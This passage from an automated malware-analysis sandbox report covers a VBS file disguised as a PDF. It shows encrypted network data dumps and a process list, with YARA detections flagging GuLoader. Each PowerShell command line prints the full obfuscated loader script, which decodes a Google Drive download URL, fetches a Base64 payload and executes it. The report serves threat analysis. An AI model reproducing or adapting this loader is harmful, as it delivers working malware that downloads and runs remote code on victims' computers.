                              Data Ascii: +2?jS05#'4?QM;4WLov~#*eBlj@v5#P>ticT\-Jx!aj>c:jbD/wJIOpltJ~/W(X9=bbE5amMyKOxMC[u;uy$RKS!NJ[CLLXj9@f,u"Y^Z
                              2024-10-01 05:50:15 UTC1390INData Raw: 70 17 77 12 9b 4f c3 a4 10 84 75 00 55 8d 57 e5 57 1c 01 ca 5d 64 0d 0e 65 d5 04 d2 7c 03 a3 d2 a4 78 e2 dc 3e 6a 41 7d 8f fe 40 1b e0 2c 7d 30 e4 93 cc ae 09 98 e8 1f 88 23 73 2e 6b 60 ea 54 70 e4 52 6c 72 8a bc 17 11 e5 6e 72 6d 43 ce 5b bc 7b fb 96 79 a9 4b 1b 73 d8 dd a9 c1 bf b6 fd bc aa 05 58 a0 53 69 91 47 bd 0e e8 e2 cc bc 7d f3 8a b3 f2 96 ef 2b 1d 5b 61 4e a1 5f a0 87 ec a6 00 59 54 c2 02 84 fb 96 78 c5 32 cd 13 5c 7d 25 43 cb b3 e7 d5 bd 22 62 99 ec ec 54 e8 63 00 ae 4c 13 b7 fb b6 dc 81 f6 ba 72 2d 56 e3 61 ea 55 09 4d dd 40 64 72 89 ac 29 97 93 9e f3 14 6f ba 33 5a 42 4c 6e 71 de 97 b3 ca a9 29 a1 ac f2 b0 c1 6c 1a 4a 7e 86 b7 d0 d0 c4 76 f2 ab e5 bf e4 28 5d 58 a2 72 91 26 54 b8 d9 81 16 25 5f fc dc 1e cc 36 9f 23 01 5f 53 c2 bf f3 29 9f e4
                              Data Ascii: pwOuUWW]de|x>jA}@,}0#s.k`TpRlrnrmC[{yKsXSiG}+[aN_YTx2\}%C"bTcLr-VaUM@dr)o3ZBLnq)lJ~v(]Xr&T%_6#_S)
                              2024-10-01 05:50:15 UTC1390INData Raw: 0a ba e4 17 a8 29 be 89 7b 0a af 17 d2 69 b0 d3 0a c3 22 1a 11 41 81 a8 5b 6f 14 89 6d 81 9d 5c 0e a5 e4 6f 2c 0c 3b 3e 71 9e 8f 34 e9 e6 96 24 6c 7f e6 a0 3e a9 79 6c b4 19 6b 21 b5 b3 fc 7f 7e db 51 21 61 cf d6 e6 81 d2 26 9f e4 d0 c3 79 97 ea a4 45 16 a1 40 92 fa 95 53 85 f4 7f 8f 70 b6 b1 15 48 07 1d 85 26 fa da df 4e ed 32 85 da 15 3a 56 05 00 ef 4e cb a2 e9 59 f8 49 3a 51 3a ba 7e 6b 75 46 34 d1 5c e7 02 68 e6 cc 3b 23 dd ae fc ee 39 cd 00 eb 79 58 54 d6 04 85 0a ae 49 ba fc 8f 8a 3b 34 f2 14 b5 7c 41 b9 f2 db ac c5 f0 67 9b 55 9d 42 39 69 2c 3d 9b aa 75 fd 7b 02 2d ac 92 04 d9 d1 07 3a 2a 2a 00 c5 4b 1f 09 ee b5 63 db 60 5f 8b 23 21 65 a7 3e c1 e4 47 e6 3e d9 6c 98 22 12 7c 4c 0f 6f c3 24 0c 1a de 07 36 4d 06 ed fd f9 46 59 1e 32 d8 58 a2 26 13 c4
                              Data Ascii: ){i"A[om\o,;>q4$l>ylk!~Q!a&yE@SpH&N2:VNYI:Q:~kuF4\h;#9yXTI;4|AgUB9i,=u{-:**Kc`_#!e>G>l"|Lo$6MFY2X&
                              2024-10-01 05:50:15 UTC1390INData Raw: 63 51 fb 31 50 be 73 c6 e9 b3 fc 01 7f 52 17 05 3f 77 f2 de f8 4f af 81 77 25 05 14 b6 2b 0a 6b b3 ef b2 95 39 88 9e ad 54 35 59 af 20 eb 17 50 59 fb 2b ae 8e fa 38 f7 16 10 2f 64 2e 8c 6d ad 73 d7 62 75 7d 8d 9c 33 19 b1 70 a9 39 2a a2 c3 16 2e d7 63 be cf 8e 6b 6c 9f 95 61 35 3a f2 a4 1f a0 46 f9 70 94 34 06 5e 3a 70 1e 3d ca ef 7f a2 0d 06 32 2b 84 58 fc 42 8d f0 a5 78 05 13 87 7d 57 39 70 e6 d0 3e 82 f8 31 b0 47 36 36 11 95 58 88 5e 4f 91 ff 0b 07 6a a3 ac ae cd 2a ff 3e f6 ba 17 86 18 ff 18 c2 59 d8 16 8a be 82 a7 9d 5f 36 aa 30 c5 a7 d9 97 f1 44 c8 b0 e7 45 c1 96 f4 66 6d 71 ae f5 49 86 c6 bf 65 b8 2b bb 36 2a 69 de 25 17 6a 30 94 68 62 e5 ef ea 54 b9 01 cb 8e b5 b8 01 86 78 d8 47 0c 50 b7 ce e6 88 67 37 a3 37 e3 d9 4f 7c e6 3d 1e 3e 72 9d fc ab 62
                              Data Ascii: cQ1PsR?wOw%+k9T5Y PY+8/d.msbu}3p9*.ckla5:Fp4^:p=2+XBx}W9p>1G66X^Oj*>Y_60DEfmqIe+6*i%j0hbTxGPg77O|=>rb
                              2024-10-01 05:50:15 UTC1390INData Raw: 6f 5b e3 30 ad cc 35 6e 18 6a 92 4d 4b 9b f2 fc ed 69 ee 61 4d cd 16 92 4c 63 c0 8d 4f f1 46 c7 71 fd 21 60 ac 82 08 ba 8c 69 96 14 9e 8e 2d d3 f6 04 63 20 3e 63 23 c4 d5 3c f9 ee ea fb 49 2d 4b 04 1d fb f9 3f 5a 8c 4e bc 69 99 c5 47 dc 9e 26 0e 5a 6d 2d a7 85 20 a1 d0 e5 e0 73 29 5a 2a 8f f7 23 c3 6d 30 e3 67 4f 3f 9d 9b f5 0d ea a5 be 83 eb 0d 3c 3b 2d e3 41 07 eb 40 9c f0 42 10 f3 31 c7 7a b8 a3 ee 98 98 02 a7 99 5e e8 eb 32 93 d9 d2 83 4c 5a 6c b0 3c c2 10 c7 bb 3e 81 2a 13 ef 42 40 3a 97 06 b1 22 3b af b4 fb 93 a9 84 de 43 49 51 ec 83 46 7b 5f 58 19 57 df 46 bf 13 1b 04 11 9f 89 d8 5f 55 d4 18 4a 3e c8 ba 9f fa d7 5a 11 15 3c 14 b1 39 13 9f f8 e1 29 65 1b 31 0a b4 1b eb ae 60 bf 5d 4e 4f 9c 0a 0b 8a ba 21 d6 a0 5b 80 1e 42 51 80 7e 21 71 ba 30 3f 3a
                              Data Ascii: o[05njMKiaMLcOFq!`i-c >c#<I-K?ZNiG&Zm- s)Z*#m0gO?<;-A@B1z^2LZl<>*B@:";CIQF{_XWF_UJ>Z<9)e1`]NO![BQ~!q0?:
                              2024-10-01 05:50:15 UTC1390INData Raw: e6 e1 40 5f ed c7 d7 4c 28 aa e0 19 ad 9c 21 d5 ea e3 e5 37 ed 5e 77 a3 b8 8d 54 dc d6 e6 5e 0b f8 e7 33 3f 10 5a 78 0f 97 a8 1b 43 b4 e8 e5 b8 e4 29 c9 df 60 45 ea 50 42 05 76 7f 09 7d a9 46 33 1d 15 7b 15 6d 9e 32 87 f6 ba ad 4d 0b a6 28 c8 ac 22 c1 e9 51 da 19 d3 08 43 df c4 e0 6e c8 c8 fd de 61 1c 4b e5 e8 7e ec 4f 7c 1a ff a4 23 ea 0a 42 7a 93 e7 8f 30 1b b0 8f e8 cb 35 51 c2 a9 c4 c0 28 c8 f8 88 b8 b0 55 a8 0a ec a8 b7 62 98 f2 00 ae 1f 9c 00 a8 3e 54 2b af 47 1c a8 0e 38 29 71 a7 59 2a 3d a5 51 0c a6 97 8d e0 df e3 ee 46 41 c1 c4 48 b8 ef 20 56 ee c2 fa 72 86 35 72 fe f2 1d 00 21 e8 29 63 0d 74 ac 49 31 7d d5 cf 27 da a5 78 f0 f2 3e 6a e7 3b 47 56 8c b5 05 71 3d a1 7f f4 c3 52 74 9b ae 7c b0 8a 3d d0 66 5f 62 50 a7 f2 3d 92 21 d9 bc df 9d 4a c6 e7
                              Data Ascii: @_L(!7^wT^3?ZxC)`EPBv}F3{m2M("QCnaK~O|#Bz05Q(Ub>T+G8)qY*=QFAH Vr5r!)ctI1}'x>j;GVq=Rt|=f_bP=!J
                              2024-10-01 05:50:15 UTC1390INData Raw: 7e cc 7c 47 8f 88 94 f0 24 eb 69 e6 aa 1c 5c 83 cf d5 1f ad 68 d5 e5 50 48 f6 e1 30 13 ac d1 4c bd 21 6c 29 be e4 da ea 4f 8a f6 f2 10 b5 b7 2e dc bc de f3 ed 75 30 4c 07 2c 09 54 83 e7 04 30 21 4e f1 00 e4 4a 83 b3 02 5e c2 68 38 28 81 c8 79 f2 f0 67 61 92 c4 cd 36 06 06 37 00 97 f3 d3 b6 c1 d3 53 34 0e 05 6c 30 a5 fa c8 ad 13 c3 fc 20 24 de 19 00 e5 39 d1 35 95 9f 15 ec 43 4e fe 85 c7 ad 5e b2 87 52 65 01 05 a4 91 39 6c f5 cc 83 a4 48 5c 2e ac c9 ac 09 0a 72 ff e1 77 1a 72 38 6e 6f af 66 6d 87 de 3b ee 7d 05 2d 72 49 05 82 6b ce c2 dd 92 0b 57 d7 5e 80 75 b0 23 7e 92 17 66 58 80 42 29 8b 35 5f 96 0d b0 c7 83 6a c4 43 59 fc 19 44 90 7f 2c 0c 27 e0 cb 37 fc 0b 5d e1 0f db 7b 7d 3c ac b5 6f 4d cf fd 5e 98 e9 99 4e 89 df 99 11 38 de 9e 69 d8 7b 1c 90 50 b7
                              Data Ascii: ~|G$i\hPH0L!l)O.u0L,T0!NJ^h8(yga67S4l0 $95CN^Re9lH\.rwr8nofm;}-rIkW^u#~fXB)5_jCYD,'7]{}<oM^N8i{P


                              Click to jump to process

                              Click to jump to process

                              Click to dive into process behavior distribution

                              Click to jump to process

                              Target ID:0
                              Start time:01:49:29
                              Start date:01/10/2024
                              Path:C:\Windows\System32\wscript.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Aj#U00e1nlatk#U00e9r#U00e9s 09-30-2024#U00b7pdf.vbs"
                              Imagebase:0x7ff705b40000
                              File size:170'496 bytes
                              MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:2
                              Start time:01:49:32
                              Start date:01/10/2024
                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Linnas Kandidtwr overskyet Ecdysial Hjlandene Providentialism Selekteringer #>;$Rystelses='Makeress';<#plungy Firdobling Preferrers Aftvingende Encoders Hardier Forsvarschefernes #>;$Hvsnings=$host.PrivateData;If ($Hvsnings) {$narrishkeit++;}function atomangreb($Antipapistical246){$Bondske=$Fremmeligst+$Antipapistical246.Length-$narrishkeit;for( $Halfheartednesses=5;$Halfheartednesses -lt $Bondske;$Halfheartednesses+=6){$minkfarven+=$Antipapistical246[$Halfheartednesses];}$minkfarven;}function rme($Stillehavsflaadernes){ . ($posthume) ($Stillehavsflaadernes);}$Gulvmaattens=atomangreb 'SpinaMb ugeoSade zSkyldiD.rivlTsarelPartea Hexi/ uror5Angin. Prod0A.tin Manom(skonnWmyoepibarsen MigodUnaudo SulfwSnv.es Lati Kons NBaan.TIniti Kldni1Regis0Bolig.Kirop0Opsam; Civi AntyW Pub iVir,lnWid.w6Rance4 igna;alene A,tabxReemk6Crabb4Speci;Handl IrettrAl,miv Budg:midda1Colpe2N dbr1Bombe. Hosl0Under)Ambit SubelGRenteeU eldcValthkMeethoHyper/In,ho2 Dune0 etnk1 List0 Medb0Nark 1Subef0Alder1 onr WicksFVaginiTwi.trB rguephanefSci,soEnga,xVandl/Gstel1 umsk2 Feri1Skaks.,inkl0 lge ';$librettoens=atomangreb ' alibU Tea,s CirceSui tRBegav- Geopa StorgInhomeIa.hinGarruTDisge ';$Broderierne=atomangreb 'DimplhAntietDistitGastepB,nussKrake:Ungdo/Funkt/Over.d B llr SelviAfd,ivR vieeAfkri.Drogsg RekloBidraoBe,vegIn.mulmarkseR,gnf.FigetcTuberoFamldm tang/.asteuBev.dcP eud?LammieWorkuxUdsk.pDunbaoTilm rRehant P lm=UnuandCaddioMaskiwkinemnVbnenlDelsao SnivaAtolldTegni&AlumriSm gsdBendi= Paal1 UriniIndtjs RecrL A acUDrapezM.dermSilenFdataiJLige 8Su co9 Dobbm knusOTo fl5ContofOrnam9IngenGLingul TomhoSko euZarisount,uL skdyyRefluVCanon7UdtmtqAdmetEMos itUnderw,avsprDividtFattiRTransuPalma ';$Udviskning=atomangreb 'stose>Nedfr ';$posthume=atomangreb 'BargiiMarkoE SkibX oso ';$Cassina='Kendetegner';$Dentine='\Smaalige.Eks';rme (atomangreb 'Rabat$Noncog Tap lNacroo enlsbE segapsychlStagn:AntisO oodvBo ene alkarForbecPsa ooGrundaM rcet Bire= Dy,t$ .ispeMedionvatikv orev:Tr chaPredapBarfop Scled FraiaMatert eskaaVigil+Bes,a$Dem eDB rmae AndrnSeawat oomsiSpi.nnProloeHa de ');rme (atomangreb ' Viva$PedotgDisselT rmkoSairlb PretaFlig.lClogg: KlasURemain Sregs uspet Hoveu agidSpa ei Op,eeReadodPerp.nSaddueAnke s,oextsKommu=Te,te$DriveB urmarT llgoKarnedBioloeVrlesrHeterinons e,athirOleosnInpute Succ.Illu.s Phy p Swi.lFusibiSerpetEkstr(A ous$Anti,UUnderdG udev,ndiui mprosUnshak OpmanOrga iTroopn J.ckgFarth)Staal ');rme (atomangreb ',arak[ KortNPneumeSo attSkovb.SkrmfSOverpeGarnerEnjoyvSlowmiBauxicU.eskeBrndePUndiso.ealiiFladfn Non tS,okiMPrvepaSquifnPortea GonogDemimeAfspnrOtten] Rip :fagbl: MainSF emmeKontrcBud ruLektir Knowi MldttTo nfyShantPver er KammoSymmet Vo doFl.decstratoStranlModpa Heter=Mini Brneb[drot N,erieeRaah t.umle.ForfrSFiloseMyretcStjfruUdlaarGar liBilbotSpilly tartPHock,rEpicloPapert S lioTagkacFrsteo Li,ilCoh,bT Yanoy aurepBeclaeTypec]Prize:Antnd:Re tiTMagnelFordoscadea1 Taoi2Tredi ');$Broderierne=$Unstudiedness[0];$Skomager=(atomangreb ',idde$Ka hagHresvl StamO Kal b S.ocAUnrislTvist:SlagtBRe rojAfhj R S,ilN .uckeProgn=konstn rfrieSphenw cle,- AnemOKartoBHaartJVacuueTrnincDoktoTstige UgunsSDigitYNonexSFlu,stFejlkeSvmmem Trol.DhanuNEfferEProcotUmrke.BugseWBi.leeKalasb.railCRustnlpressILaa.eEtil uNverfeT I dg ');rme ($Skomager);rme (atomangreb 'Prize$ phorBDebaujHuahurOpst nTyfo eFrimr.WaddlHMalkieMis aa nhiddVaasbe,imilr CadisE.for[Forbe$YlettlFaunii Teleb Absur,esideSc.lpt.rbort Debao Ke,beAlh.nnVandlsLogic]Pregg=Reviv$ SociG Mi.tuSclerlNiobivPersomFatteaSk igaGaul tincu t Aa.seSpongnBugvgs P.ra ');$Perdition=atomangreb ' ispl$.rdseBContrjTetrarQuin,n So.keDrage.Trap DHo umoIstn.wR.ingn Panelfragao eiteaSlotedComplFb dehiDrtril G noeKabin(Ma ie$urfunBDisporSpillo Opk dKvruleFdepurPaxili U.gieForgrrSt,drnPuddledipte, Sexi$M nipPforudr.urrao BayepWoulde Mordlruffi) Bypl ';$Propel=$Overcoat;rme (atomangreb 'Ciste$Dra ogEtaetl Ref OTrkg.bPur eaSquabl Scap:KraveCReteaATilbar nfopUnprooAudivGCaseheFago nNur,uOHapchUInappsResid=Nedfa(C.ingtYokele,kulpsForthTlibe -Dyse P HungAFlygtt GiesHOverr baand$ D poPHem tRMilliO raadPAutosEAbstilRefe,) Ass ');while (!$Carpogenous) {rme (atomangreb 'Resum$ ensogKendel Udtao drmmbSgemeaStalkl Br.v: ordiMCha giHem ssKompltTilskiOxy.el Endel LkkeiLgekod pyreeRa.binerotosReall=undia$BilistKostprR allu In teStorf ') ;rme $Perdition;rme (atomangreb 'StreaSSporttsarada Muddr NucutSsyge-revolS irazlLydm eAfseneStachpBa ne olio4 Keou ');rme (atomangreb 'Vir e$Mesteg Co plNordfoNigribBl,ffa Seatl .yrt:fiskeC C,mpa A.terOrthop Eegso oneqgMis ielocomnUlt,aoPrejuu E shs Tppe= Vita(SphalTudrejeDucktsJinritFusti- EnfoPGidseaMed.ctGrupphCirc Navn $,nderPMaarhrV ntroUf rep R maePhosplVener) Gru, ') ;rme (atomangreb 'toywo$ klekgChurllSaboloLs,efbF,actaB jstlPapir: eterODri.kp Fal.tKlammr DazekCh,kenSerioiIndecn arkegLitte= pere$Transg EpislR dakoGr skbSmileaSkriflSyrak:MiswiDIndiai lansSquatp IsoceFo skr Epi,sPr noiO bluo.allon eriseOverer EndonSpej eFlock+S lvr+Gonoz%A omi$UranoUPege,nL llis VaastunaccuEno.mdPantoiLe,icesad ldffebenDispoeAlkohs Tweis .ita. ByrecBoglao MiniuUpswenSt ert heck ') ;$Broderierne=$Unstudiedness[$Optrkning];}$Diktatet=320570;$Syntaksgenkendelserne=31274;rme (atomangreb ' Laan$StartgCoronlMultio OverbUforua .razlAngli:BurnePSuperaBillerBenefaFdresdDischeGall favetguAn dilOutpu Re n=D ama FortjGGravee RundtCargo-mesioC NeuroHerben BandtFosseeKidnanSubcot emia Odor $MissePZenitrFinano Datap s ideVordil Ou s ');rme (atomangreb ' Pra $Gene gskrbelFo gio servbBommeaudma lAnlgg:Sa,elSNaadeyCoequdSavenfAk amoStrtarT rbah AblenY uthgIrvine upernTurcye uzzwsFo nj Udma =Edelh Succe[ GlasSNynazyMikros obbet KeyweParenm Foxd.SpandCRadiaoTransn vetsvTs.tseOlenirB,nkotExcav]Galac:Cani :EstabF ittirCalisoMicromCo toBCorklaDimwisUnp reJurym6Jalou4TsardSnedbrt FzfurPussyiSp ngnGudf.g Ridd(Unjag$ DeodPC lloaMatsar OrdraB,odid Vareep nfefExtrauGlog lZonei) snak ');rme (atomangreb 'Bees,$AgacegR.genlInteroSpaltb landa Vandlfritj: P osRMongreBrancg .omgiTilvioAfs.anSlibrpSphyglMudpuaLv konQuan aThyrorBluenbFir.eeAmetyjLungedByplae,urbarDanse didra=Scrim Ungra[NaboiSTo guyGuya sDramatAskebeTotalmLatin.Unr cT Ve beOverhx OvertBacch. BronE BiolnGoderc moutoFu,igd Missi,iphtn C,tagPreto]Emnea:Nonme:EarthA FlugS atiCPl nuITr,ncIRiefs.JudicGAa dleZygodt illiSEftertjesp,rKeyseiPolonn ispugOutpo(,onoc$ Sk.uSSte tyCheq d CongfLejefoJeme rEndebhF,cadnskewigCho.neTyfusn ameeBro,esVenal) Kyma ');rme (atomangreb 'B,ndo$Ma.neg LupulOvertoLock bFam,laVansilunri :TopfiSDerbunHomoeiSemirgManuav UdkoeAparujAktieeTowie= Bibl$PackeRSanyaeTraadgFeltniintero Led nUnexhpNelielSkykla godvnMeddea mprirPompobRakkeeNostajTheopd Uns eFlankrAfhre.skodds Cinqu etrob Pakhs BagttFremlrBrunliGdni,n OpacgBo se(Tan.k$SuffrD Actiigartnk ap rtMe.tia TambtGimpeeNiftitstavl,Pamfi$DirekS ,artyJ mban Lit tGodstaward k.ntelsHellig RegieBeskynSmedekUnsp,eHeternMen edO ceteK ptalFlgessTakeue RethrT.agin raggeTires) Baad ');rme $Snigveje;"
                              Imagebase:0x7ff7be880000
                              File size:452'608 bytes
                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000002.00000002.2221990774.000001F3C0564000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              Reputation:high
                              Has exited:true

                              Target ID:3
                              Start time:01:49:32
                              Start date:01/10/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff6d64d0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:4
                              Start time:01:49:44
                              Start date:01/10/2024
                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Linnas Kandidtwr overskyet Ecdysial Hjlandene Providentialism Selekteringer #>;$Rystelses='Makeress';<#plungy Firdobling Preferrers Aftvingende Encoders Hardier Forsvarschefernes #>;$Hvsnings=$host.PrivateData;If ($Hvsnings) {$narrishkeit++;}function atomangreb($Antipapistical246){$Bondske=$Fremmeligst+$Antipapistical246.Length-$narrishkeit;for( $Halfheartednesses=5;$Halfheartednesses -lt $Bondske;$Halfheartednesses+=6){$minkfarven+=$Antipapistical246[$Halfheartednesses];}$minkfarven;}function rme($Stillehavsflaadernes){ . ($posthume) ($Stillehavsflaadernes);}$Gulvmaattens=atomangreb 'SpinaMb ugeoSade zSkyldiD.rivlTsarelPartea Hexi/ uror5Angin. Prod0A.tin Manom(skonnWmyoepibarsen MigodUnaudo SulfwSnv.es Lati Kons NBaan.TIniti Kldni1Regis0Bolig.Kirop0Opsam; Civi AntyW Pub iVir,lnWid.w6Rance4 igna;alene A,tabxReemk6Crabb4Speci;Handl IrettrAl,miv Budg:midda1Colpe2N dbr1Bombe. Hosl0Under)Ambit SubelGRenteeU eldcValthkMeethoHyper/In,ho2 Dune0 etnk1 List0 Medb0Nark 1Subef0Alder1 onr WicksFVaginiTwi.trB rguephanefSci,soEnga,xVandl/Gstel1 umsk2 Feri1Skaks.,inkl0 lge ';$librettoens=atomangreb ' alibU Tea,s CirceSui tRBegav- Geopa StorgInhomeIa.hinGarruTDisge ';$Broderierne=atomangreb 'DimplhAntietDistitGastepB,nussKrake:Ungdo/Funkt/Over.d B llr SelviAfd,ivR vieeAfkri.Drogsg RekloBidraoBe,vegIn.mulmarkseR,gnf.FigetcTuberoFamldm tang/.asteuBev.dcP eud?LammieWorkuxUdsk.pDunbaoTilm rRehant P lm=UnuandCaddioMaskiwkinemnVbnenlDelsao SnivaAtolldTegni&AlumriSm gsdBendi= Paal1 UriniIndtjs RecrL A acUDrapezM.dermSilenFdataiJLige 8Su co9 Dobbm knusOTo fl5ContofOrnam9IngenGLingul TomhoSko euZarisount,uL skdyyRefluVCanon7UdtmtqAdmetEMos itUnderw,avsprDividtFattiRTransuPalma ';$Udviskning=atomangreb 'stose>Nedfr ';$posthume=atomangreb 'BargiiMarkoE SkibX oso ';$Cassina='Kendetegner';$Dentine='\Smaalige.Eks';rme (atomangreb 'Rabat$Noncog Tap lNacroo enlsbE segapsychlStagn:AntisO oodvBo ene alkarForbecPsa ooGrundaM rcet Bire= Dy,t$ .ispeMedionvatikv orev:Tr chaPredapBarfop Scled FraiaMatert eskaaVigil+Bes,a$Dem eDB rmae AndrnSeawat oomsiSpi.nnProloeHa de ');rme (atomangreb ' Viva$PedotgDisselT rmkoSairlb PretaFlig.lClogg: KlasURemain Sregs uspet Hoveu agidSpa ei Op,eeReadodPerp.nSaddueAnke s,oextsKommu=Te,te$DriveB urmarT llgoKarnedBioloeVrlesrHeterinons e,athirOleosnInpute Succ.Illu.s Phy p Swi.lFusibiSerpetEkstr(A ous$Anti,UUnderdG udev,ndiui mprosUnshak OpmanOrga iTroopn J.ckgFarth)Staal ');rme (atomangreb ',arak[ KortNPneumeSo attSkovb.SkrmfSOverpeGarnerEnjoyvSlowmiBauxicU.eskeBrndePUndiso.ealiiFladfn Non tS,okiMPrvepaSquifnPortea GonogDemimeAfspnrOtten] Rip :fagbl: MainSF emmeKontrcBud ruLektir Knowi MldttTo nfyShantPver er KammoSymmet Vo doFl.decstratoStranlModpa Heter=Mini Brneb[drot N,erieeRaah t.umle.ForfrSFiloseMyretcStjfruUdlaarGar liBilbotSpilly tartPHock,rEpicloPapert S lioTagkacFrsteo Li,ilCoh,bT Yanoy aurepBeclaeTypec]Prize:Antnd:Re tiTMagnelFordoscadea1 Taoi2Tredi ');$Broderierne=$Unstudiedness[0];$Skomager=(atomangreb ',idde$Ka hagHresvl StamO Kal b S.ocAUnrislTvist:SlagtBRe rojAfhj R S,ilN .uckeProgn=konstn rfrieSphenw cle,- AnemOKartoBHaartJVacuueTrnincDoktoTstige UgunsSDigitYNonexSFlu,stFejlkeSvmmem Trol.DhanuNEfferEProcotUmrke.BugseWBi.leeKalasb.railCRustnlpressILaa.eEtil uNverfeT I dg ');rme ($Skomager);rme (atomangreb 'Prize$ phorBDebaujHuahurOpst nTyfo eFrimr.WaddlHMalkieMis aa nhiddVaasbe,imilr CadisE.for[Forbe$YlettlFaunii Teleb Absur,esideSc.lpt.rbort Debao Ke,beAlh.nnVandlsLogic]Pregg=Reviv$ SociG Mi.tuSclerlNiobivPersomFatteaSk igaGaul tincu t Aa.seSpongnBugvgs P.ra ');$Perdition=atomangreb ' ispl$.rdseBContrjTetrarQuin,n So.keDrage.Trap DHo umoIstn.wR.ingn Panelfragao eiteaSlotedComplFb dehiDrtril G noeKabin(Ma ie$urfunBDisporSpillo Opk dKvruleFdepurPaxili U.gieForgrrSt,drnPuddledipte, Sexi$M nipPforudr.urrao BayepWoulde Mordlruffi) Bypl ';$Propel=$Overcoat;rme (atomangreb 'Ciste$Dra ogEtaetl Ref OTrkg.bPur eaSquabl Scap:KraveCReteaATilbar nfopUnprooAudivGCaseheFago nNur,uOHapchUInappsResid=Nedfa(C.ingtYokele,kulpsForthTlibe -Dyse P HungAFlygtt GiesHOverr baand$ D poPHem tRMilliO raadPAutosEAbstilRefe,) Ass ');while (!$Carpogenous) {rme (atomangreb 'Resum$ ensogKendel Udtao drmmbSgemeaStalkl Br.v: ordiMCha giHem ssKompltTilskiOxy.el Endel LkkeiLgekod pyreeRa.binerotosReall=undia$BilistKostprR allu In teStorf ') ;rme $Perdition;rme (atomangreb 'StreaSSporttsarada Muddr NucutSsyge-revolS irazlLydm eAfseneStachpBa ne olio4 Keou ');rme (atomangreb 'Vir e$Mesteg Co plNordfoNigribBl,ffa Seatl .yrt:fiskeC C,mpa A.terOrthop Eegso oneqgMis ielocomnUlt,aoPrejuu E shs Tppe= Vita(SphalTudrejeDucktsJinritFusti- EnfoPGidseaMed.ctGrupphCirc Navn $,nderPMaarhrV ntroUf rep R maePhosplVener) Gru, ') ;rme (atomangreb 'toywo$ klekgChurllSaboloLs,efbF,actaB jstlPapir: eterODri.kp Fal.tKlammr DazekCh,kenSerioiIndecn arkegLitte= pere$Transg EpislR dakoGr skbSmileaSkriflSyrak:MiswiDIndiai lansSquatp IsoceFo skr Epi,sPr noiO bluo.allon eriseOverer EndonSpej eFlock+S lvr+Gonoz%A omi$UranoUPege,nL llis VaastunaccuEno.mdPantoiLe,icesad ldffebenDispoeAlkohs Tweis .ita. ByrecBoglao MiniuUpswenSt ert heck ') ;$Broderierne=$Unstudiedness[$Optrkning];}$Diktatet=320570;$Syntaksgenkendelserne=31274;rme (atomangreb ' Laan$StartgCoronlMultio OverbUforua .razlAngli:BurnePSuperaBillerBenefaFdresdDischeGall favetguAn dilOutpu Re n=D ama FortjGGravee RundtCargo-mesioC NeuroHerben BandtFosseeKidnanSubcot emia Odor $MissePZenitrFinano Datap s ideVordil Ou s ');rme (atomangreb ' Pra $Gene gskrbelFo gio servbBommeaudma lAnlgg:Sa,elSNaadeyCoequdSavenfAk amoStrtarT rbah AblenY uthgIrvine upernTurcye uzzwsFo nj Udma =Edelh Succe[ GlasSNynazyMikros obbet KeyweParenm Foxd.SpandCRadiaoTransn vetsvTs.tseOlenirB,nkotExcav]Galac:Cani :EstabF ittirCalisoMicromCo toBCorklaDimwisUnp reJurym6Jalou4TsardSnedbrt FzfurPussyiSp ngnGudf.g Ridd(Unjag$ DeodPC lloaMatsar OrdraB,odid Vareep nfefExtrauGlog lZonei) snak ');rme (atomangreb 'Bees,$AgacegR.genlInteroSpaltb landa Vandlfritj: P osRMongreBrancg .omgiTilvioAfs.anSlibrpSphyglMudpuaLv konQuan aThyrorBluenbFir.eeAmetyjLungedByplae,urbarDanse didra=Scrim Ungra[NaboiSTo guyGuya sDramatAskebeTotalmLatin.Unr cT Ve beOverhx OvertBacch. BronE BiolnGoderc moutoFu,igd Missi,iphtn C,tagPreto]Emnea:Nonme:EarthA FlugS atiCPl nuITr,ncIRiefs.JudicGAa dleZygodt illiSEftertjesp,rKeyseiPolonn ispugOutpo(,onoc$ Sk.uSSte tyCheq d CongfLejefoJeme rEndebhF,cadnskewigCho.neTyfusn ameeBro,esVenal) Kyma ');rme (atomangreb 'B,ndo$Ma.neg LupulOvertoLock bFam,laVansilunri :TopfiSDerbunHomoeiSemirgManuav UdkoeAparujAktieeTowie= Bibl$PackeRSanyaeTraadgFeltniintero Led nUnexhpNelielSkykla godvnMeddea mprirPompobRakkeeNostajTheopd Uns eFlankrAfhre.skodds Cinqu etrob Pakhs BagttFremlrBrunliGdni,n OpacgBo se(Tan.k$SuffrD Actiigartnk ap rtMe.tia TambtGimpeeNiftitstavl,Pamfi$DirekS ,artyJ mban Lit tGodstaward k.ntelsHellig RegieBeskynSmedekUnsp,eHeternMen edO ceteK ptalFlgessTakeue RethrT.agin raggeTires) Baad ');rme $Snigveje;"
                              Imagebase:0xb70000
                              File size:433'152 bytes
                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000004.00000002.3059410794.0000000008A30000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
